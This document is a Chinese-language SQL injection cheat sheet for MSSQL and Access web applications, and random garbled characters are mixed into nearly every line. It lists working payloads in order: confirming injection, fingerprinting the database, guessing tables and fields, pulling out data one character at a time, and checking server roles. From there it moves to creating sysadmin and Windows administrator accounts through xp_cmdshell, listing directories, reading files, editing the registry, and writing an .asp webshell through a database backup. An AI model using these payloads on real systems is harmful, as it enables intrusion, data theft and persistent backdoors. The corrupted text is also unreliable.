1.判断是否有注入;and 1=1 ;and 1=2 F�Gy7K�VR�
2.初步判断是否是mssql ;and user>0 vTh-I&�}:
d,8�V-Dk+p
3.注入参数是字符'and [查询条件] and ''=' �`��axNeqM
3P^eD:)
w�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' `�i���f*��
D7sw;�{n�s
5.判断数据库系统 �I@pnZ��-5
c��?V�,a`6
;and (select count(*) from sysobjects)>0 mssql Hu�1w/PLq�
A�;�SR�m<,
;and (select count(*) from msysobjects)>0 access j��MW|B��
J4��!Z,��-
&EE�6<-B-�
8EN��Aif��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 #�#�}a0\x|
d0�MX4�bhZ
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 IR5 �S�-vO
$�daI++v`
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %�/1`"M5ko
h+�R}O�9BD
9.(1)猜字段的ascii值(access) i:q�c2#O:J
0}Kl47�}aD
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 p ���K�K�n
[9[�t�n��-
(2)猜字段的ascii值(mssql) �|pq z(�j7
�\@MGO�aR]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +\"@2mOH{+
Wu�SRA<{P
10.测试权限结构(mssql) az�j<aa�H�
Y�4�9kq}�
Vn=�J$Uv0�
_q3SR[k�+`
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )Q�w|)='�-
d�jZO�x�;/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- I".d>]16�|
D;BFl(�l��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- kk�i]6�_/n
C�U��lANd"
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �P�@k
;Lg"
�*Ty>-aS1�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V�xo�3RwmR
*/��O6cF�7
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1V FAfv�%}
m�4>v S��
;and 1=(select IS_MEMBER('db_owner'));-- +&�(sZFW5o
�'9{�H(DA�
�I/XVo2�Ee
pC_��2_,6$
11.添加mssql和系统的帐户 �$�S�nwx��
�GrVvOJr��
;exec master.dbo.sp_addlogin username;-- H�# 2'\�0u
;exec master.dbo.sp_password null,username,password;-- 6CY_8/�:zL
"N7C7`�izc
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- z#D@mn5\�a
J@!Sf7k42�
;exec master.dbo.xp_cmdshell 'net user username password �zh�*N�RN
hh:0m�\�@<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _�Xs��n�1�
J5@�_OIc1y
;exec master.dbo.xp_cmdshell 'net user username password /add';--
m��EyZ<U9
A3�C<�9wXx
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?�|�N:[.�
�e0v�&�wSi
Tg{d#U_qB
F'pD_d9�]e
12.(1)遍历目录 _$i�9Tk���
=qI����JXV
;create table dirs(paths varchar(100), id int) zVl�(?b&CF
u^!-��Z)�W
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��rh�$%*�l
d�Yf�V�ox;
;and (select top 1 paths from dirs)>0 M~�ynJ@q��
z4UeUVf�Z}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Pg*ZQE[ME8
D'�uz�H|z8
s�x`C�<c~u
W�XO�@oZ!�
(2)遍历目录 qI8{JcFx:
�xCo�Q>.4p
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �M��s{v;fT
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 -_b}b)2iYN
4�2Kzd�o|}
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 B�O�/2kL8*
R4@C>\c�%m
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �I��F5+&O�
�%z.u
%� %
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �z~z.J��]�
D?X9�7jN�m
?B@iB�Ocu[
=]Q��u"nRB
13.mssql中的存储过程 T3'dfe��U�
�A3Ltk 2<�
xp_regenumvalues 注册表根键, 子键 ``>W�FLWTn
�g>VkQos5"
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 `P :�-a7�_
m�(*CuM[E�
xp_regread 根键,子键,键值名 _�W]3_�1Lu
mgH4)!Z*56
;exec xp_regread �Tvf]OJ�9N
Er~5\9,/<]
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 CO4*"�~']t
BuK�8�2���
xp_regwrite 根键,子键, 值名, 值类型, 值 Dug�r{�Y/0
BR"*-$u0�;
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 P�(A%z2Ql�
NrS1y"#�d9
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 (M�Ju�3t
@
���=_�.Zv�
xp_regdeletevalue 根键,子键,值名 iw�r�dZLE�
�)9L1�WOGi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 E*r�Dw�Td�
T'f�E�4}rY
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 P9X/yZ42��
^[^u�DE
<�
=0x[Sa$&�,
�X}
8rr�C=
14.mssql的backup创建webshell >�Mi�A|N�=
*K-,<h�J#L
use model QJOP��*�<O
G}��}o��eS
create table cmd(str image); >��Pbd#�*
)�M�'#l<9B
insert into cmd(str) values (''); �}{]�{`\�
�$zxC��v7�
backup database model to disk='c:\l.asp'; LT2m��wJ�l
Wm���Od�1�
|D`Z�i>lv
�d-x�Km2sH
15.mssql内置函数 {9'�"�!f�H
`|v0@-'�$�
;and (select @@version)>0 获得Windows的版本号 }IEY�H&4!
SG�j�aH�8z
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��-�pa�.-@
=We}&80��x
;and (select user_name())>0 爆当前系统的连接用户 n#�Z6��d`�
U�/|�B I�F
;and (select db_name())>0 得到当前连接的数据库 � LDwu?"P!
?Mji'Z�W}
F�!^ Y!Y@H
;'2�y6"\�Y
16.简洁的webshell s^3t18m&1
o` ,&yq��.
use model TZ-n)r�C)v
B\Rq0N]' M
create table cmd(str image); �]'�2p"A0U
pE�hWg�CL�
insert into cmd(str) values (''); ���!Bu<�6
|wVoJO!�O}
backup database model to disk='g:\wwwtest\l.asp';
